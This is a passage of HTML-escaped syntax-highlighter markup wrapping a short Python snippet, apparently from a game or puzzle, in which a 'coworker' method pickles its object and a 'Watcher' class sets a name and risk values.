font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-49&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-50&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;coworker&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-51&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;shuffle&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworkers_list&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-52&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;cw&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworkers_list&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pop&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-53&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot; %s : [Coworker] Find : %s !&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;%&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;cw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-54&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworkers&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;cw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-55&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pickle&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;dumps&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-56&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-57&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;class&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;Watcher&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-58&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;__init__&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-59&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Magellan&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-60&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;dig_risk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-61&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;bomb_risk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; 